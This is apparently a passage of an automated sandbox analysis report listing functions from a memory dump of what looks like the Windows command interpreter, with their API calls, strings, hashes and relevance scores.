Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: ErrorFileLast$DeleteRead_get_osfhandle
String ID:
API String ID: 3588551418-0
Opcode ID: 7f1813dbf000f725e2430dc65e28f05e82bc0e3d36d1b41048ea1d24cfbdb362
Instruction ID: 9d196a7356da686c1b7fb45e29ecb0ed17ac05bd85a31b80ef2b6b885cb0ea1a
Opcode Fuzzy Hash: 7f1813dbf000f725e2430dc65e28f05e82bc0e3d36d1b41048ea1d24cfbdb362
Instruction Fuzzy Hash: 0731E835A10106DFDB2BDF24D895A7A77AEFF84341F11442AE806DB260DB30DD40DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00346A96, Relevance: 7.6, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00346ACB

Part of subcall function 00340C70: ??_V@YAXPAX@Z.MSVCRT ref: 00340CBA
Part of subcall function 00340C70: memset.MSVCRT ref: 00340CDD

GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,-00000001,?,?,00000000), ref: 00346B0F
GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00346B3E
??_V@YAXPAX@Z.MSVCRT ref: 00346B4F

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$DriveInformationTypeVolume
String ID:
API String ID: 285405857-0
Opcode ID: 983fe92a95d8540989cbd692985966ad1254dddbc381f8d9eab843274430097b
Instruction ID: 0ff5a04e1a5fdcb0ac8b636264f69b956bec569aca6290a4ecfb4df2ed35b545
Opcode Fuzzy Hash: 983fe92a95d8540989cbd692985966ad1254dddbc381f8d9eab843274430097b
Instruction Fuzzy Hash: BF21D671900118ABCB22DFA5DC8AAEFBBBCEF06310F04055AE505D7150DB35AA44CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00340662, Relevance: 7.6, APIs: 5, Instructions: 75COMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00340699
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,003369F2,?,00000001,?,?,00000000), ref: 003406A1

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: FilePointer_get_osfhandle
String ID:
API String ID: 1013686580-0
Opcode ID: 54953ecfea68e5a3eec6c8842b96fa319fb7a4144ddb3ce661868baf24d81a7f
Instruction ID: 3ddf1fc0c10a3041317624cf0ccec4407bac2a2d2e39a6b99138172af12064ac
Opcode Fuzzy Hash: 54953ecfea68e5a3eec6c8842b96fa319fb7a4144ddb3ce661868baf24d81a7f
Instruction Fuzzy Hash: 34112731211200ABE3776B65EC4BF2937ECEB45320F20461AF10AAF2E0CF71BD948650

Uniqueness

Uniqueness Score: -1.00%

Function 00357EC0, Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00340178: _get_osfhandle.MSVCRT ref: 00340183
Part of subcall function 00340178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0034D6A1), ref: 0034018D

GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00357EF1
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 00357EFE

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: BufferConsoleFileHandleInfoScreenType_get_osfhandle
String ID:
API String ID: 2847887402-0
Opcode ID: 2f131f5bfe7cd0818c045d3b03ff788b35443a877193f5a2132501a03a98ec39
Instruction ID: 62fc954a278c231f7281a2a8c647cb6fc00a9905bb069ab9bab805d7c99c1b2f
Opcode Fuzzy Hash: 2f131f5bfe7cd0818c045d3b03ff788b35443a877193f5a2132501a03a98ec39
Instruction Fuzzy Hash: 46217235D142099ACB12EFF4AC05AEFB7B8EF0C711F10411AF915FB150EA309944C769

Uniqueness

Uniqueness Score: -1.00%

Function 00353BB0, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,0034997F,00000000,?,0035A0FC,?,?,?), ref: 00353BBA

Part of subcall function 00340178: _get_osfhandle.MSVCRT ref: 00340183
Part of subcall function 00340178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0034D6A1), ref: 0034018D

FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,0034997F,00000000,?,0035A0FC,?,?,?), ref: 00353BE9
_getch.MSVCRT ref: 00353BEF
EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,0034997F,00000000,?,0035A0FC,?,?,?), ref: 00353C07
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,0034997F,00000000,?,0035A0FC,?,?,?), ref: 00353C1D

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: CriticalSection$BufferConsoleEnterFileFlushHandleInputLeaveType_get_osfhandle_getch
String ID:
API String ID: 491502236-0
Opcode ID: d3176d0d1b641bea4c94c9a81eceb910586e2f495aaef9e192bddea8a9f708da
Instruction ID: c595d4c4221ad995892fdbadf70d248f9081804e22a7b7231b508c1534753d3c
Opcode Fuzzy Hash: d3176d0d1b641bea4c94c9a81eceb910586e2f495aaef9e192bddea8a9f708da
Instruction Fuzzy Hash: 5A01D4325142587FD727AB60AC4EFAA7B6CDB00362F10065AFC06A61B1DBB15A848251

Uniqueness

Uniqueness Score: -1.00%

Function 00343AAE, Relevance: 7.5, APIs: 5, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,00343A9F), ref: 00343AB2
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 00343ACD
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00343AD4
memcpy.MSVCRT ref: 00343AE3
FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 00343AEC

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: EnvironmentHeapStrings$AllocFreeProcessmemcpy
String ID:
API String ID: 713576409-0
Opcode ID: e4376c47e9f499f08efe2b9f2777e75e1b2eda526c1aaaee6d5ff9f568deb019
Instruction ID: aa833a071429752348ab8f1730345ee1771929b166d51014c882d786c93b664b
Opcode Fuzzy Hash: e4376c47e9f499f08efe2b9f2777e75e1b2eda526c1aaaee6d5ff9f568deb019
Instruction Fuzzy Hash: 8BE09A7360152267C223232A6C4DEAF6AAEEBC9B61B460216F90DCB200DE308D4685B1

Uniqueness

Uniqueness Score: -1.00%

Function 0033F090, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188COMMON

Download Yara Rule

Strings

Ungetting: '%s', xrefs: 0034C4E2
GeToken: (%x) '%s', xrefs: 0034C4B7

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: GeToken: (%x) '%s'$Ungetting: '%s'
API String ID: 0-1704545398
Opcode ID: 6a739e5928ebcfb6adf4cf7594e1619cb0f214c8c2516e8d5d550e4b64d52bb0
Instruction ID: 8ae5a2c3931f710f53323c03896163f34a19656388e738159e03cc7ece3823fc
Opcode Fuzzy Hash: 6a739e5928ebcfb6adf4cf7594e1619cb0f214c8c2516e8d5d550e4b64d52bb0
Instruction Fuzzy Hash: 7C514B35E00100DFD727ABA8E9D137A72A9EB50314F96853AE847CF2A1EBB19C41C751

Uniqueness

Uniqueness Score: -1.00%

Function 00354B4E, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 139registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00354B9E
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00354C2C

Strings

%s=%s, xrefs: 00354BED, 00354CAB
., xrefs: 00354BAE

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: EnumErrorLast
String ID: %s=%s$.
API String ID: 1967352920-4275322459
Opcode ID: 47502421cff8f64cfa92d788cc72de0be9e971aaba57f779cf9d6605b49d29b0
Instruction ID: c95472d36f840ffc0ae9823df80451d472b40fe77447b5c2a43c27ef8b5db98b
Opcode Fuzzy Hash: 47502421cff8f64cfa92d788cc72de0be9e971aaba57f779cf9d6605b49d29b0
Instruction Fuzzy Hash: F2417B71F01219A7CB3BAB655C95EBF72B8DBD0309F0641A9EC0B9F251DA709D848790

Uniqueness

Uniqueness Score: -1.00%

Function 00336663, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 119COMMON

Download Yara Rule

APIs

Part of subcall function 00336785: iswdigit.MSVCRT ref: 003367A5
Part of subcall function 00336785: wcschr.MSVCRT ref: 003367B6
Part of subcall function 00336785: wcschr.MSVCRT ref: 003367C9
Part of subcall function 00336785: wcschr.MSVCRT ref: 003367ED
Part of subcall function 00336785: wcschr.MSVCRT ref: 00336804

wcschr.MSVCRT ref: 0033675C

Strings

wc3, xrefs: 00336690, 003366FD, 0033671F
<>+-*/%()|^&=,, xrefs: 00336757
wc3, xrefs: 00336745

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: wcschr$iswdigit
String ID: <>+-*/%()|^&=,$wc3$wc3
API String ID: 2770779731-1703032423
Opcode ID: 31d1e5f338a4bd5ed4e0ac2e4b7dec7dfd653508c1379f731d8a16b7d633cb40
Instruction ID: 7e7e73ccd52a5f4a734569f31e82a93d531756f01f2710e852965372a5a58839
Opcode Fuzzy Hash: 31d1e5f338a4bd5ed4e0ac2e4b7dec7dfd653508c1379f731d8a16b7d633cb40
Instruction Fuzzy Hash: AE413672900509AFCF12EF50D892AEB37A9EF45364F51C126FC15AF240EBB1AE45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 003462FA, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 87COMMON

Download Yara Rule

APIs

_wcsnicmp.MSVCRT ref: 00346367
_wcsnicmp.MSVCRT ref: 0034F6F6

Strings

/-Y, xrefs: 0034F6F0
COPYCMD, xrefs: 00346314

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcsnicmp
String ID: /-Y$COPYCMD
API String ID: 1886669725-617350906
Opcode ID: 55b61cc035e40c7bc390371b40384a366973bfe3228b12cda6a190512f33e32e
Instruction ID: 522c5cf9182a685a2bc63bc8e783f62d61bac034d9f50d69425699b1ccfa6b35
Opcode Fuzzy Hash: 55b61cc035e40c7bc390371b40384a366973bfe3228b12cda6a190512f33e32e
Instruction Fuzzy Hash: E3219B79A002519BDB269F099C472BAB6F9EF86350F56006AF8499F260EB30BD41C151

Uniqueness

Uniqueness Score: -1.00%

Function 0035AB79, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0035ABB5

Part of subcall function 00340C70: ??_V@YAXPAX@Z.MSVCRT ref: 00340CBA
Part of subcall function 00340C70: memset.MSVCRT ref: 00340CDD

_wcslwr.MSVCRT ref: 0035AC29
??_V@YAXPAX@Z.MSVCRT ref: 0035AC59

Strings

[%s], xrefs: 0035ABEA

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$_wcslwr
String ID: [%s]
API String ID: 886762496-302437576
Opcode ID: 0fa02c978ffbf8594b5c997ef193f695efb6f68eba1fde834536316179014812
Instruction ID: f460e23923577e55b9637d20cca9802803852928f752fd200410317f71d65421
Opcode Fuzzy Hash: 0fa02c978ffbf8594b5c997ef193f695efb6f68eba1fde834536316179014812
Instruction Fuzzy Hash: AF21D771B002195BDB16DBA5DCC5FBEBBF8AF08300F0401A9E904D7151EA74DD489B91

Uniqueness

Uniqueness Score: -1.00%

Function 003423A9, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00342430: iswspace.MSVCRT ref: 00342440

iswspace.MSVCRT ref: 003423C8
_wcsnicmp.MSVCRT ref: 00342419

Strings

off, xrefs: 00342413

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: iswspace$_wcsnicmp
String ID: off
API String ID: 3989682491-733764931
Opcode ID: c98c828f88ef789ae5d7f255368c0f8a00748c79feaba8e1c02d420f3565682b
Instruction ID: 8dcd79ad7093db358f1b2060aa49465211741240e3daacc6daf1e8dd1982b86f
Opcode Fuzzy Hash: c98c828f88ef789ae5d7f255368c0f8a00748c79feaba8e1c02d420f3565682b
Instruction Fuzzy Hash: C111E52A70021256EA27262B6C46B3B12E8DF91795FE6012AFC46FE6C1EE04BD419171

Uniqueness

Uniqueness Score: -1.00%

Function 00354506, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 00347721: __iob_func.MSVCRT ref: 00347726

fprintf.MSVCRT ref: 00354522

Strings

CMD Internal Error %s, xrefs: 00354514
%s, xrefs: 00354555
Null environment, xrefs: 0035450F

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: __iob_funcfprintf
String ID: CMD Internal Error %s$%s$Null environment
API String ID: 620453056-2781220306
Opcode ID: 5447d654e3a335937726dcd95c99b10bc27a56ba2c26a7ff4646ef96239a5533
Instruction ID: bdc08f297f01d763c1db697df4028fd236e42d99e8ca5904d93139227a19a5cf
Opcode Fuzzy Hash: 5447d654e3a335937726dcd95c99b10bc27a56ba2c26a7ff4646ef96239a5533
Instruction Fuzzy Hash: A6017B379442118BCB3B6B9C7882DB36358DAD232A7160D2BFC5A97554FBA06DCA8080

Uniqueness

Uniqueness Score: -1.00%

Function 00352950, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll.dll), ref: 00352979
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RtlDllShutdownInProgress), ref: 0035298A

Strings

RtlDllShutdownInProgress, xrefs: 00352984
ntdll.dll, xrefs: 00352974

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: RtlDllShutdownInProgress$ntdll.dll
API String ID: 1646373207-582119455
Opcode ID: 0043204439cbbc4822b40635cda69dcd18a857c10b8300e5c68b6c545da7e216
Instruction ID: f1ea3296fbd132e20663d2a55af786ed9309b1fa95184097c7cf8eaaaf34e5dd
Opcode Fuzzy Hash: 0043204439cbbc4822b40635cda69dcd18a857c10b8300e5c68b6c545da7e216
Instruction Fuzzy Hash: 51F09631A11314EB8B339F24AD49B6B37ECEB46715F42025AEC05D7320DB205D558A82

Uniqueness

Uniqueness Score: -1.00%

Function 003388D8, Relevance: 6.2, APIs: 4, Instructions: 184COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00338991

Part of subcall function 00340C70: ??_V@YAXPAX@Z.MSVCRT ref: 00340CBA
Part of subcall function 00340C70: memset.MSVCRT ref: 00340CDD

??_V@YAXPAX@Z.MSVCRT ref: 00338AAB

Part of subcall function 003436CB: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,?,0033590A,00000000), ref: 003436F0

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$CurrentDirectory
String ID:
API String ID: 168429351-0
Opcode ID: 6ccd05cb1c9684b4040354d0352ebba6be83f2fc741919cbb60251846ea5d0eb
Instruction ID: 1eebc257938a1684d2fac527c0eb54e18773f8f2bd5904c40f96aac8607466b9
Opcode Fuzzy Hash: 6ccd05cb1c9684b4040354d0352ebba6be83f2fc741919cbb60251846ea5d0eb
Instruction Fuzzy Hash: 2A6156716083419FD32ACF69D485A6BBBE5FF88310F14492EF999D7260DB30A908CB46

Uniqueness

Uniqueness Score: -1.00%

Function 00335F75, Relevance: 6.2, APIs: 4, Instructions: 183COMMON

Download Yara Rule

APIs

_wcsnicmp.MSVCRT ref: 00335FD2
_wcsnicmp.MSVCRT ref: 00335FE6
wcschr.MSVCRT ref: 0033601D

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcsnicmp$wcschr
String ID:
API String ID: 3270668897-0
Opcode ID: 7c297e6261892348cd3f8b401c7176cff33abbc57d9d8c8110df0197c40aff18
Instruction ID: 7a98b7c5819370dc5a7d04050b1ab53ca4a7711b7fbaf5fcf9a899491395b53b
Opcode Fuzzy Hash: 7c297e6261892348cd3f8b401c7176cff33abbc57d9d8c8110df0197c40aff18
Instruction Fuzzy Hash: EB519F39244A109BDB2BEF24989267E73E4EF84741F66845DEC429F2C1EB715E82C291

Uniqueness

Uniqueness Score: -1.00%

Function 0033AF70, Relevance: 6.2, APIs: 4, Instructions: 179COMMON

Download Yara Rule

APIs

Part of subcall function 003400B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0033DF68,00000001,?,00000000,00343458,-00000105,0035BDD8,00000240,00344B82,00000000,00000000,0034AE6E,00000000), ref: 003400C1
Part of subcall function 003400B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0033DF68,00000001,?,00000000,00343458,-00000105,0035BDD8,00000240,00344B82,00000000,00000000,0034AE6E,00000000,?), ref: 003400C8

_pipe.MSVCRT ref: 0033AF9F

Part of subcall function 0033DBCE: _dup.MSVCRT ref: 0033DBD5

longjmp.MSVCRT(0036B8B8,00000001), ref: 003512F1

Part of subcall function 0033DBFC: _dup2.MSVCRT ref: 0033DC10

Part of subcall function 0033DB92: _close.MSVCRT ref: 0033DBC1

_get_osfhandle.MSVCRT ref: 0033B047
DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 0033B055

Part of subcall function 0033E040: memset.MSVCRT ref: 0033E090
Part of subcall function 0033E040: wcschr.MSVCRT ref: 0033E0F3
Part of subcall function 0033E040: wcschr.MSVCRT ref: 0033E10B
Part of subcall function 0033E040: _wcsicmp.MSVCRT ref: 0033E179

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Heapwcschr$AllocDuplicateHandleProcess_close_dup_dup2_get_osfhandle_pipe_wcsicmplongjmpmemset
String ID:
API String ID: 1441200171-0
Opcode ID: c0a53c182a8e7de4d939866f8ca5b4feda69bd8be958330c9ba877c3f69c5d61
Instruction ID: 5debdce1b751e69ddff9afbd3e27992ffadf6cb23273b61e9376e4d4877c6a87
Opcode Fuzzy Hash: c0a53c182a8e7de4d939866f8ca5b4feda69bd8be958330c9ba877c3f69c5d61
Instruction Fuzzy Hash: 705188316007009FD736DF29D896B26B3E9EB85325F118E1DF56ACB6E1EB309845CB41

Uniqueness

Uniqueness Score: -1.00%

Function 003402B0, Relevance: 6.2, APIs: 4, Instructions: 165COMMON

Download Yara Rule

APIs

iswdigit.MSVCRT ref: 00340301
iswdigit.MSVCRT ref: 00340360
iswdigit.MSVCRT ref: 0034044A

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: iswdigit
String ID:
API String ID: 3849470556-0
Opcode ID: 30a6f28d9e15ebb8b5be7a6454309d80843ba8a4b7331ab0e483f7cd9355bb16
Instruction ID: f301f99ac62d9b98e2e1d0ca725452644b006513ed238d367a1634148aee34fd
Opcode Fuzzy Hash: 30a6f28d9e15ebb8b5be7a6454309d80843ba8a4b7331ab0e483f7cd9355bb16
Instruction Fuzzy Hash: ED510574A011049FDB1ADFA9D58027DB7F5EF80300F26816ADA06DF351EB75AD81DB80

Uniqueness

Uniqueness Score: -1.00%

Function 00342D22, Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,00343C29,?,00000000,-00000001,00000000,?,00000000), ref: 00342D87
SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00343C29,?,00000000,-00000001,00000000,?,00000000), ref: 00342D91
GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,00343C29,?,00000000,-00000001,00000000,?,00000000), ref: 00342DA4
SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00343C29,?,00000000,-00000001,00000000,?,00000000), ref: 00342DAE

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: ErrorMode$FullNamePath
String ID:
API String ID: 268959451-0
Opcode ID: 1c88aa42b5228bb459ca83ced98170a28bf906a72ff37a9f4e281543632f4572
Instruction ID: fdb754a81e332611af0294bf44cad61bb1344706496ee858ed1a516efae64a19
Opcode Fuzzy Hash: 1c88aa42b5228bb459ca83ced98170a28bf906a72ff37a9f4e281543632f4572
Instruction Fuzzy Hash: 39416839500101ABCB29DF68C8519BBB3E9EF88300B558A5EE81ADF650D371BE81C790

Uniqueness

Uniqueness Score: -1.00%

Function 0033EEF0, Relevance: 6.1, APIs: 4, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,?,0033E5F6,?,00000000,00000000,00000000), ref: 0033EF39
RtlFreeHeap.NTDLL(00000000,?,0033E5F6), ref: 0033EF40
_setjmp3.MSVCRT ref: 0033EFA5
VirtualFree.API-MS-WIN-CORE-MEMORY-L1-1-0(00000000,00000000,00008000,00000000,00000000,00000000,?,0033E5F6,?,00000000,00000000,00000000), ref: 0033F00D

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: FreeHeap$ProcessVirtual_setjmp3
String ID:
API String ID: 2613391085-0
Opcode ID: c3c7404f4c0a5c93e9572ebc53f61842f69e3a6fcdfb04e322ed591fa5bff65c
Instruction ID: 342570b95a9c18e40be91164a6b75e7d884c109debaf824d6f805fee14893917
Opcode Fuzzy Hash: c3c7404f4c0a5c93e9572ebc53f61842f69e3a6fcdfb04e322ed591fa5bff65c
Instruction Fuzzy Hash: 493193717103519FD723AF69AC85726BBECBB44705F16852AF409EB2A1DBF0D880CB51

Uniqueness

Uniqueness Score: -1.00%

Function 003529B9, Relevance: 6.1, APIs: 4, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,?,?,?,?,?,?,?,?,?,?,00351C4B), ref: 00352A34
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00351C4B), ref: 00352A3B
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00351C4B), ref: 00352A4D
RtlFreeHeap.NTDLL(00000000), ref: 00352A54

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 0885c5415e2f71ab5467fd81b19a826c2c9d09f3d8049e5e22609116ea7995b5
Instruction ID: ef0de3b4ad7f1c1d2d3b3da9825d2e833fe5972bd003438e61857acbd86ee0df
Opcode Fuzzy Hash: 0885c5415e2f71ab5467fd81b19a826c2c9d09f3d8049e5e22609116ea7995b5
Instruction Fuzzy Hash: 2E315875A00600DFCB26DFA9C484A5ABBF5FF48311B00896AEC4ACB721EB30E945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0033AEB0, Relevance: 6.1, APIs: 4, Instructions: 77stringCOMMON

Download Yara Rule

APIs

wcstol.MSVCRT ref: 0033AEC7
wcstol.MSVCRT ref: 0033AED7
lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?), ref: 0033AF51
lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?), ref: 0033AF5B

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: wcstol$lstrcmplstrcmpi
String ID:
API String ID: 4273384694-0
Opcode ID: 1e45fd6abbba9617f7f86884ecff67388f9ef1450dba975008652acdfeb180b1
Instruction ID: 104777b0a8eb64769a715e4bbaccdc69e49b91dc3b22c4977a57d05c46b2c288
Opcode Fuzzy Hash: 1e45fd6abbba9617f7f86884ecff67388f9ef1450dba975008652acdfeb180b1
Instruction Fuzzy Hash: D511E4B2900C2ABB87635FB88E889767B6CFF01350F120350E845D7E90D721DD6092D2

Uniqueness

Uniqueness Score: -1.00%

